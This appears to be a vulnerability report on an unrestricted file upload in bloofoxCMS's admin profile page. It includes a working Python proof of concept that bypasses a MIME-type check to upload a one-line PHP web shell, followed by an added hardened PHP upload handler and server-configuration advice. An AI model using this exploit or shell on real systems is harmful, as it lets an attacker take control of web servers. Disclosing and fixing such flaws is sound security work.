Open
Description
I found an Unrestricted File Upload in http://localhost/bloofoxCMS/admin/index.php?mode=user&action=profile&userid=[ID] -> filename param. The filename param only checks the MIME type, which can be bypassed.
PoC :-
import requests
sid = 'xxxxxxxxxxxxxxxxxxxxxxxxxx' # The Admin Session
url = "http://localhost/bloofoxCMS/bloofoxCMS/admin/index.php?page=myprofile"
data = {'username':'admin','send':'Save'}
r = requests.post(url, data=data, headers={'Cookie':'sid='+sid+';'},files={'filename': ('texst.php', "<?=`$_GET[1]`;", 'image/jpeg')}).text.split('/media/images/profiles/')[1].split("'")[0]
print('Your Shell in http://localhost/bloofoxCMS//admin/media/images/profiles/'+r)
Impact
Uploading backdoor PHP files, which leads to control of the victim web server
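The report says the upload handler trusts the MIME type supplied with the request. The following is an added example, not bloofoxCMS code and not from the reporter, of an upload handler that ignores both client-supplied fields (type and file name); `store_profile_image()`, the size limit and the list of allowed types are assumptions.

```php
<?php
// Added example, not bloofoxCMS code. store_profile_image(), the size
// limit and the type list are assumptions made for illustration.

const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];
const MAX_IMAGE_BYTES = 2 * 1024 * 1024;

/** Validate one $_FILES entry and store it; returns the stored file name. */
function store_profile_image(array $file, string $destDir): string
{
    $tmp = $file['tmp_name'] ?? '';
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($tmp)) {
        throw new RuntimeException('upload failed');
    }
    if (filesize($tmp) > MAX_IMAGE_BYTES) {
        throw new RuntimeException('file too large');
    }

    // $file['type'] is the Content-Type header sent by the client, so it is
    // never consulted. Detect the type from the file's bytes instead.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if (!is_string($mime) || !array_key_exists($mime, ALLOWED_IMAGE_TYPES)) {
        throw new RuntimeException('not an allowed image type');
    }

    // The file must also parse as an image of that same type.
    $info = @getimagesize($tmp);
    if ($info === false || $info['mime'] !== $mime) {
        throw new RuntimeException('not a valid image');
    }

    // $file['name'] is discarded: the server picks a random base name and
    // the extension that matches the detected type, so a valid image that
    // also carries script text is still stored as .jpg/.png/.gif.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
    $target = rtrim($destDir, '/') . '/' . $name;
    if (!move_uploaded_file($tmp, $target)) {
        throw new RuntimeException('could not store file');
    }
    chmod($target, 0644);
    return $name;
}
```

Configuring the web server so that the profile image directory is served as static files only, with no PHP handler, adds a second layer if a check like this is ever bypassed.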